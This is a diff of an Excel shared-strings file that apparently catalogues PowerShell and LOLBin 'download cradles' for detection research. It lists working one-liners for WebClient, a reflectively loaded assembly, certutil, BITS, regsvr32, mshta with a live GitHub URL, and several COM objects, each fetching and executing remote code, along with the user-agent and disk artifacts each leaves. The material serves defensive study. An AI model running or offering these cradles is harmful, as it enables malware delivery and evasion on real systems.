+C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\*.tmp</t>
+  </si>
+  <si>
+    <t>OPTIONS: Microsoft Office Excel 2013
+HEAD: Microsoft Office Excel 2013
+HEAD: Microsoft Office Existence Discovery
+GET: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 15)</t>
+  </si>
+  <si>
+    <t>OPTIONS: Microsoft Office Word 2013
+HEAD: Microsoft Office Word 2013
+HEAD: Microsoft Office Existence Discovery
+Get: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 15)</t>
+  </si>
+  <si>
+    <t>Get: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geko</t>
+  </si>
+  <si>
+    <t>Get: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)</t>
+  </si>
+  <si>
+    <t>HEAD: Microsoft BITS/7.5
+GET: Microsoft BITS/7.5</t>
+  </si>
+  <si>
+    <t>GET: CertUtil URL Agent
+GET: Microsoft-CryptoAPI/6.1</t>
+  </si>
+  <si>
+    <t>GET: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>C# Inline</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
       </rPr>
       <t xml:space="preserve">
 Add-Type 'using System.Net;public class Class{public static string Method(string url){return (new WebClient()).DownloadString(url);}}';IEX ([Class]::Method($Url))
@@ -1029,94 +915,6 @@
     </r>
   </si>
   <si>
-    <t>None of interest - minor temp writes by Powershell.exe
-C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\*.temp
-C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\*.tmp</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>C# Compiled</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-Powershell version: 2+
-Proxy: proxy aware
-memory only (some interesting disk artifacts)
-[Void][System.Reflection.Assembly]::Load([Byte[]](@(77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+@(0)*7+@(80,69,0,0,76,1,3,0,6,190,153,90)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,0,0,0,0,0,0,110,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)+@(0)*8+@(128,0,0,0,2,0,0,0,0,0,0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(32,35,0,0,75,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,0,0,8)+@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,116,3,0,0,0,32,0,0,0,4,0,0,0,2)+@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46,114,101,108,111,99,0,0,12,0,0,0,0,96,0,0,0,2,0,0,0,10)+@(0)*14+@(64,0,0,66)+@(0)*16+@(80,35,0,0,0,0,0,0,72,0,0,0,2,0,5,0,120,32,0,0,168,2,0,0,1)+@(0)*55+@(19,48,2,0,17,0,0,0,1,0,0,17,0,115,3,0,0,10,2,40,4,0,0,10,10,43,0,6,42,30,2,40,5,0,0,10,42,0,0,0,66,83,74,66,1,0,1,0,0,0,0,0,12,0,0,0,118,50,46,48,46,53,48,55,50,55,0,0,0,0,5,0,108,0,0,0,12,1,0,0,35,126,0,0,120,1,0,0,204,0,0,0,35,83,116,114,105,110,103,115,0,0,0,0,68,2,0,0,8,0,0,0,35,85,83,0,76,2,0,0,16,0,0,0,35,71,85,73,68,0,0,0,92,2,0,0,76,0,0,0,35,66,108,111,98)+@(0)*7+@(2,0,0,1,71,21,2,0,9,0,0,0,0,250,1,51,0,22,0,0,1,0,0,0,4,0,0,0,2,0,0,0,2,0,0,0,1,0,0,0,5,0,0,0,2,0,0,0,1,0,0,0,1,0,0,0,2,0,0,0,0,0,10,0,1,0,0,0,0,0,6,0,43,0,36,0,6,0,95,0,63,0,6,0,127,0,63,0,10,0,179,0,168,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,16,0,21,0,0,0,5,0,1,0,1,0,80,32,0,0,0,0,150,0,50,0,10,0,1,0,109,32,0,0,0,0,134,24,57,0,15,0,2,0,0,0,1,0,164,0,17,0,57,0,19,0,25,0,57,0,15,0,33,0,57,0,15,0,33,0,189,0,24,0,9,0,57,0,15,0,46,0,11,0,33,0,46,0,19,0,42,0,29,0,4,128)+@(0)*16+@(157,0,0,0,2)+@(0)*11+@(1,0,27,0,0,0,0,0,2)+@(0)*11+@(1,0,36)+@(0)*8+@(60,77,111,100,117,108,101,62,0,99,114,97,100,108,101,46,100,108,108,0,67,108,97,115,115,0,109,115,99,111,114,108,105,98,0,83,121,115,116,101,109,0,79,98,106,101,99,116,0,77,101,116,104,111,100,0,46,99,116,111,114,0,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,67,111,109,112,105,108,101,114,83,101,114,118,105,99,101,115,0,67,111,109,112,105,108,97,116,105,111,110,82,101,108,97,120,97,116,105,111,110,115,65,116,116,114,105,98,117,116,101,0,82,117,110,116,105,109,101,67,111,109,112,97,116,105,98,105,108,105,116,121,65,116,116,114,105,98,117,116,101,0,99,114,97,100,108,101,0,117,114,108,0,83,121,115,116,101,109,46,78,101,116,0,87,101,98,67,108,105,101,110,116,0,68,111,119,110,108,111,97,100,83,116,114,105,110,103,0,0,3,32,0,0,0,0,0,221,77,161,112,179,108,67,66,138,95,4,222,69,250,124,72,0,8,183,122,92,86,25,52,224,137,4,0,1,14,14,3,32,0,1,4,32,1,1,8,4,32,1,14,14,3,7,1,14,8,1,0,8,0,0,0,0,0,30,1,0,1,0,84,2,22,87,114,97,112,78,111,110,69,120,99,101,112,116,105,111,110,84,104,114,111,119,115,1,0,0,0,72,35)+@(0)*8+@(0,0,94,35,0,0,0,32)+@(0)*22+@(80,35)+@(0)*8+@(95,67,111,114,68,108,108,77,97,105,110,0,109,115,99,111,114,101,101,46,100,108,108,0,0,0,0,0,255,37,0,32,64)+@(0)*155+@(1,0,16,0,0,0,24,0,0,128)+@(0)*14+@(1,0,1,0,0,0,48,0,0,128)+@(0)*14+@(1,0,0,0,0,0,72,0,0,0,88,64,0,0,68,2)+@(0)*8+@(0,0,68,2,52,0,0,0,86,0,83,0,95,0,86,0,69,0,82,0,83,0,73,0,79,0,78,0,95,0,73,0,78,0,70,0,79,0,0,0,0,0,189,4,239,254,0,0,1)+@(0)*16+@(0,63)+@(0)*7+@(4,0,0,0,2)+@(0)*14+@(0,68,0,0,0,1,0,86,0,97,0,114,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0,0,0,0,0,36,0,4,0,0,0,84,0,114,0,97,0,110,0,115,0,108,0,97,0,116,0,105,0,111,0,110)+@(0)*7+@(176,4,164,1,0,0,1,0,83,0,116,0,114,0,105,0,110,0,103,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0,0,0,128,1,0,0,1,0,48,0,48,0,48,0,48,0,48,0,52,0,98,0,48,0,0,0,44,0,2,0,1,0,70,0,105,0,108,0,101,0,68,0,101,0,115,0,99,0,114,0,105,0,112,0,116,0,105,0,111,0,110,0,0,0,0,0,32,0,0,0,48,0,8,0,1,0,70,0,105,0,108,0,101,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56,0,11,0,1,0,73,0,110,0,116,0,101,0,114,0,110,0,97,0,108,0,78,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,40,0,2,0,1,0,76,0,101,0,103,0,97,0,108,0,67,0,111,0,112,0,121,0,114,0,105,0,103,0,104,0,116,0,0,0,32,0,0,0,64,0,11,0,1,0,79,0,114,0,105,0,103,0,105,0,110,0,97,0,108,0,70,0,105,0,108,0,101,0,110,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,52,0,8,0,1,0,80,0,114,0,111,0,100,0,117,0,99,0,116,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56,0,8,0,1,0,65,0,115,0,115,0,101,0,109,0,98,0,108,0,121,0,32,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48)+@(0)*360+@(32,0,0,12,0,0,0,112,51)+@(0)*502));([Class]::Method($Url)) | IEX</t>
-    </r>
-  </si>
-  <si>
-    <t>OPTIONS: Microsoft Office Excel 2013
-HEAD: Microsoft Office Excel 2013
-HEAD: Microsoft Office Existence Discovery
-GET: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 15)</t>
-  </si>
-  <si>
-    <t>OPTIONS: Microsoft Office Word 2013
-HEAD: Microsoft Office Word 2013
-HEAD: Microsoft Office Existence Discovery
-Get: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 15)</t>
-  </si>
-  <si>
-    <t>Get: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geko</t>
-  </si>
-  <si>
-    <t>Get: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)</t>
-  </si>
-  <si>
-    <t>HEAD: Microsoft BITS/7.5
-GET: Microsoft BITS/7.5</t>
-  </si>
-  <si>
-    <t>GET: CertUtil URL Agent
-GET: Microsoft-CryptoAPI/6.1</t>
-  </si>
-  <si>
-    <t>GET: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>C# Inline</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-Add-Type 'using System.Net;public class Class{public static string Method(string url){return (new WebClient()).DownloadString(url);}}';IEX ([Class]::Method($Url))
-Powershell version: 2+
-Proxy: proxy aware
-memory only (some interesting disk artifacts)</t>
-    </r>
-  </si>
-  <si>
     <r>
       <rPr>
         <b/>
@@ -1201,31 +999,6 @@
       </rPr>
       <t xml:space="preserve"> Best detection via commandline and process chains
 Regsvr32.exe connecting out to the internet is a good indicator.</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>PowerShell MsXml COM Object:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET',$Url,$False);$comMsXml.Send();IEX $comMsXml.ResponseText 
-Powershell version: 2+
-Proxy: not proxy aware
-memory only</t>
     </r>
   </si>
   <si>
@@ -1480,100 +1253,6 @@
 Works in CLM (Constrained Language Mode)
 Invoke-WebRequest: memory only
 Invoke-RequestMethod: memory only</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>PowerShell Excel COM Object:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <i/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>$comExcel=New-Object -ComObject Excel.Application;While($comExcel.Busy){Start-Sleep -Seconds 1}$comExcel.DisplayAlerts=$False;$Null=$comExcel.Workbooks.Open($Url[0]);While($comExcel.Busy){Start-Sleep -Seconds 1}IEX(($comExcel.Sheets.Item(1).Range("A1:R"+$comExcel.Sheets.Item(1).UsedRange.Rows.Count).Value2|?{$_})-Join"`n");$comExcel.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comExcel)</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-Powershell version: 2+
-Microsoft Excel installed
-Proxy capable
-memory only</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>PowerShell Word COM Object:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <i/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>$comWord=New-Object -ComObject Word.Application;While($comWord.Busy){Start-Sleep -Seconds 1}$comWord.Visible=$False;$doc=$comWord.Documents.Open($Url);While($comWord.Busy){Start-Sleep -Seconds 1}IEX($doc.Content.Text);$comWord.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comWord)</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-Powershell version: 2+
-Microsoft Word installed
-Proxy capable
-memory only</t>
     </r>
   </si>
   <si>
@@ -9319,6 +8998,317 @@
 $comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET',$Url,$False);$comMsXml.Send();IEX $comMsXml.ResponseText 
 Powershell version: 2+
 PSComMsxml: memory only</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)"/>
+      </rPr>
+      <t>C# inline</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)"/>
+      </rPr>
+      <t xml:space="preserve">
+Add-Type 'using System.Net;public class Class{public static string Method(string url){return (new WebClient()).DownloadString(url);}}';IEX ([Class]::Method($Url))
+Powershell version: 2+
+Proxy capable
+memory only (some interesting disk artifacts)</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>C# Compiled</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Powershell version: 2+
+Proxy capable
+memory only (some interesting disk artifacts)
+[Void][System.Reflection.Assembly]::Load([Byte[]](@(77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+@(0)*7+@(80,69,0,0,76,1,3,0,6,190,153,90)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,0,0,0,0,0,0,110,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)+@(0)*8+@(128,0,0,0,2,0,0,0,0,0,0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(32,35,0,0,75,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,0,0,8)+@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,116,3,0,0,0,32,0,0,0,4,0,0,0,2)+@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46,114,101,108,111,99,0,0,12,0,0,0,0,96,0,0,0,2,0,0,0,10)+@(0)*14+@(64,0,0,66)+@(0)*16+@(80,35,0,0,0,0,0,0,72,0,0,0,2,0,5,0,120,32,0,0,168,2,0,0,1)+@(0)*55+@(19,48,2,0,17,0,0,0,1,0,0,17,0,115,3,0,0,10,2,40,4,0,0,10,10,43,0,6,42,30,2,40,5,0,0,10,42,0,0,0,66,83,74,66,1,0,1,0,0,0,0,0,12,0,0,0,118,50,46,48,46,53,48,55,50,55,0,0,0,0,5,0,108,0,0,0,12,1,0,0,35,126,0,0,120,1,0,0,204,0,0,0,35,83,116,114,105,110,103,115,0,0,0,0,68,2,0,0,8,0,0,0,35,85,83,0,76,2,0,0,16,0,0,0,35,71,85,73,68,0,0,0,92,2,0,0,76,0,0,0,35,66,108,111,98)+@(0)*7+@(2,0,0,1,71,21,2,0,9,0,0,0,0,250,1,51,0,22,0,0,1,0,0,0,4,0,0,0,2,0,0,0,2,0,0,0,1,0,0,0,5,0,0,0,2,0,0,0,1,0,0,0,1,0,0,0,2,0,0,0,0,0,10,0,1,0,0,0,0,0,6,0,43,0,36,0,6,0,95,0,63,0,6,0,127,0,63,0,10,0,179,0,168,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,16,0,21,0,0,0,5,0,1,0,1,0,80,32,0,0,0,0,150,0,50,0,10,0,1,0,109,32,0,0,0,0,134,24,57,0,15,0,2,0,0,0,1,0,164,0,17,0,57,0,19,0,25,0,57,0,15,0,33,0,57,0,15,0,33,0,189,0,24,0,9,0,57,0,15,0,46,0,11,0,33,0,46,0,19,0,42,0,29,0,4,128)+@(0)*16+@(157,0,0,0,2)+@(0)*11+@(1,0,27,0,0,0,0,0,2)+@(0)*11+@(1,0,36)+@(0)*8+@(60,77,111,100,117,108,101,62,0,99,114,97,100,108,101,46,100,108,108,0,67,108,97,115,115,0,109,115,99,111,114,108,105,98,0,83,121,115,116,101,109,0,79,98,106,101,99,116,0,77,101,116,104,111,100,0,46,99,116,111,114,0,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,67,111,109,112,105,108,101,114,83,101,114,118,105,99,101,115,0,67,111,109,112,105,108,97,116,105,111,110,82,101,108,97,120,97,116,105,111,110,115,65,116,116,114,105,98,117,116,101,0,82,117,110,116,105,109,101,67,111,109,112,97,116,105,98,105,108,105,116,121,65,116,116,114,105,98,117,116,101,0,99,114,97,100,108,101,0,117,114,108,0,83,121,115,116,101,109,46,78,101,116,0,87,101,98,67,108,105,101,110,116,0,68,111,119,110,108,111,97,100,83,116,114,105,110,103,0,0,3,32,0,0,0,0,0,221,77,161,112,179,108,67,66,138,95,4,222,69,250,124,72,0,8,183,122,92,86,25,52,224,137,4,0,1,14,14,3,32,0,1,4,32,1,1,8,4,32,1,14,14,3,7,1,14,8,1,0,8,0,0,0,0,0,30,1,0,1,0,84,2,22,87,114,97,112,78,111,110,69,120,99,101,112,116,105,111,110,84,104,114,111,119,115,1,0,0,0,72,35)+@(0)*8+@(0,0,94,35,0,0,0,32)+@(0)*22+@(80,35)+@(0)*8+@(95,67,111,114,68,108,108,77,97,105,110,0,109,115,99,111,114,101,101,46,100,108,108,0,0,0,0,0,255,37,0,32,64)+@(0)*155+@(1,0,16,0,0,0,24,0,0,128)+@(0)*14+@(1,0,1,0,0,0,48,0,0,128)+@(0)*14+@(1,0,0,0,0,0,72,0,0,0,88,64,0,0,68,2)+@(0)*8+@(0,0,68,2,52,0,0,0,86,0,83,0,95,0,86,0,69,0,82,0,83,0,73,0,79,0,78,0,95,0,73,0,78,0,70,0,79,0,0,0,0,0,189,4,239,254,0,0,1)+@(0)*16+@(0,63)+@(0)*7+@(4,0,0,0,2)+@(0)*14+@(0,68,0,0,0,1,0,86,0,97,0,114,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0,0,0,0,0,36,0,4,0,0,0,84,0,114,0,97,0,110,0,115,0,108,0,97,0,116,0,105,0,111,0,110)+@(0)*7+@(176,4,164,1,0,0,1,0,83,0,116,0,114,0,105,0,110,0,103,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0,0,0,128,1,0,0,1,0,48,0,48,0,48,0,48,0,48,0,52,0,98,0,48,0,0,0,44,0,2,0,1,0,70,0,105,0,108,0,101,0,68,0,101,0,115,0,99,0,114,0,105,0,112,0,116,0,105,0,111,0,110,0,0,0,0,0,32,0,0,0,48,0,8,0,1,0,70,0,105,0,108,0,101,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56,0,11,0,1,0,73,0,110,0,116,0,101,0,114,0,110,0,97,0,108,0,78,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,40,0,2,0,1,0,76,0,101,0,103,0,97,0,108,0,67,0,111,0,112,0,121,0,114,0,105,0,103,0,104,0,116,0,0,0,32,0,0,0,64,0,11,0,1,0,79,0,114,0,105,0,103,0,105,0,110,0,97,0,108,0,70,0,105,0,108,0,101,0,110,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,52,0,8,0,1,0,80,0,114,0,111,0,100,0,117,0,99,0,116,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56,0,8,0,1,0,65,0,115,0,115,0,101,0,109,0,98,0,108,0,121,0,32,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48)+@(0)*360+@(32,0,0,12,0,0,0,112,51)+@(0)*502));([Class]::Method($Url)) | IEX</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Certutil.exe</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+$NULL=certutil /urlcache /f $Url[0] $Outfile; GC $OutFile | IEX
+Powershell 2+
+Proxy aware
+Disk-based - Downloads to specified file or IE local cache
+Works in CLM (Constrained Language Mode)</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Microsoft BITS framework via Powershell commandlet</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Start-BitsTransfer $Url $Outfile; GC $Outfile|IEX
+Powershell 2+
+Proxy capable
+Disk-based - Downloads to specified file
+Works in CLM (Constrained Language Mode)</t>
+    </r>
+  </si>
+  <si>
+    <t>Microsoft BITS framework via Bitsadmin.exe
+$NULL=bitsadmin /transfer /Download $Url $Outfile; GC $Outfile | IEX
+Powershell 2+
+Proxy capable
+Disk-based - Downloads to specified file</t>
+  </si>
+  <si>
+    <t>Squiglydoo - regsvr32.exe as a download cradle (not specifically powershell)
+regsvr32.exe /s /u /i:$Url scrobj.dll
+Proxy aware</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>MSHTA.EXE</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+cmd /c 'mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/mgreen27/testing/master/mshta.sct").Exec();close()'
+Proxy aware
+</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>PowerShell WinHttp COM Object:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+$comWinHttp=new-object -com WinHttp.WinHttpRequest.5.1;$comWinHttp.open('GET',$Url,$false);$comWinHttp.send();IEX $comWinHttp.responseText 
+Powershell version: 2+
+Not proxy aware
+memory only</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>PowerShell MsXml COM Object:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET',$Url,$False);$comMsXml.Send();IEX $comMsXml.ResponseText 
+Powershell version: 2+
+Not proxy aware
+memory only</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>PowerShell IE COM Object:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+$comIE=New-Object -ComObject InternetExplorer.Application;While($comIE.Busy){Start-Sleep -Seconds 1}$comIE.Visible=$False;$comIE.Silent=$True;$comIE.Navigate($Url);While($comIE.Busy){Start-Sleep -Seconds 1}$comIE.Document.Body.InnerText;$comIE.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comIE) 
+Powershell version: 2+
+Microsoft Internet Explorer
+Proxy aware</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>PowerShell Word COM Object:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
